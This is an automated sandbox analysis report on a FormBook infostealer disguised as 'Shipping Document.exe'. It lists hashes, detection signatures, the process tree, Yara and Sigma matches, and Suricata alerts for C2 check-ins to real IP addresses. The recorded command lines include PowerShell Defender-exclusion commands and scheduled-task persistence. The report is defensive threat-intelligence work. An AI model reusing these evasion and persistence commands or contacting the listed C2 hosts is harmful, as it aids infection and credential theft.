Windows Analysis Report
Shipping Document.exe

Overview

General Information

Sample name: Shipping Document.exe
Analysis ID: 1630657
MD5: ef66db2edaf759d35a2c4bc13c327f37
SHA1: b70b2c2f3f3a25742671b6cedd1d237b2282f9db
SHA256: 7948d6bc00bb389e09c76ae4428fea70cbca1a58eacdf98295faba9d1b1b34be
Tags: exe, Shipping, user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Shipping Document.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
    • powershell.exe (PID: 5724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6216 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Shipping Document.exe (PID: 5984 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
      • rtO5LARBHjW9nKZi.exe (PID: 3032 cmdline: "C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\EFkRtwBfT.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • xcopy.exe (PID: 7376 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • firefox.exe (PID: 7704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • KOENBvWt.exe (PID: 1260 cmdline: C:\Users\user\AppData\Roaming\KOENBvWt.exe MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
    • schtasks.exe (PID: 7272 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KOENBvWt.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\KOENBvWt.exe" MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
10.2.Shipping Document.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
10.2.Shipping Document.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 5724, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\KOENBvWt.exe, ParentImage: C:\Users\user\AppData\Roaming\KOENBvWt.exe, ParentProcessId: 1260, ParentProcessName: KOENBvWt.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp", ProcessId: 7272, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\EFkRtwBfT.exe", ParentImage: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe, ParentProcessId: 3032, ParentProcessName: rtO5LARBHjW9nKZi.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 7376, ProcessName: xcopy.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", ProcessId: 4908, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 5724, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", ProcessId: 4908, ProcessName: schtasks.exe

AV Detection

Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, ReversingLabs: Detection: 32%
Source: Shipping Document.exe, Virustotal: Detection: 35%
Source: Shipping Document.exe, ReversingLabs: Detection: 31%
Source: Yara match, File source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Shipping Document.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Shipping Document.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: xcopy.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipping Document.exe, Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: xcopy.pdb source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358502913.0000000000F0F000.00000002.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h; function 0_2_00B51AD0
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h; function 0_2_00B519E9
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h; function 0_2_07FBCAE0
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h; function 0_2_07FBF6E4
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then push dword ptr [ebp-24h]; function 0_2_07FBFB80
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 0_2_07FBFB80
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then push dword ptr [ebp-24h]; function 0_2_07FBFB74
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 0_2_07FBFB74
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then xor edx, edx; function 0_2_07FBFAB8
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then xor edx, edx; function 0_2_07FBFAAC
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then push dword ptr [ebp-20h]; function 0_2_07FBF860
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 0_2_07FBF860
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then push dword ptr [ebp-20h]; function 0_2_07FBF855
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 0_2_07FBF855
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then jmp 09977222h; function 0_2_09976AAD
Source: C:\Users\user\Desktop\Shipping Document.exe, Code function: 4x nop then jmp 09977222h; function 0_2_09976D2E
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h; function 12_2_01151AD0
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h; function 12_2_011519C7
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then jmp 062B7846h; function 12_2_062B70CE
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then jmp 062B7846h; function 12_2_062B734F
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h; function 12_2_0884CAE0
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then push dword ptr [ebp-20h]; function 12_2_0884F858
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 12_2_0884F858
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then push dword ptr [ebp-20h]; function 12_2_0884F860
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 12_2_0884F860
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then xor edx, edx; function 12_2_0884FAAC
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then xor edx, edx; function 12_2_0884FAB8
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then push dword ptr [ebp-24h]; function 12_2_0884FB80
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 12_2_0884FB80
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then push dword ptr [ebp-24h]; function 12_2_0884FB74
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh; function 12_2_0884FB74
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h; function 12_2_0884F6E4

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49750 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49781 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49750 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49839 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49781 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49841 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49811 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49817 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49847 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49827 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49894 -> 144.76.229.203:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49790 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49883 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49880 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49928 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49899 -> 144.76.229.203:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49883 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49905 -> 144.76.229.203:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49853 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49853 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49823 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49922 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49934 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 92.204.40.98:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49940 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49940 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50003 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50003 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50007 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50007 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50017 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49827 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49874 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49786 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49796 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49796 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50005 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50009 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49911 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49911 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50013 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50011 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50011 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50015 -> 13.248.169.48:80
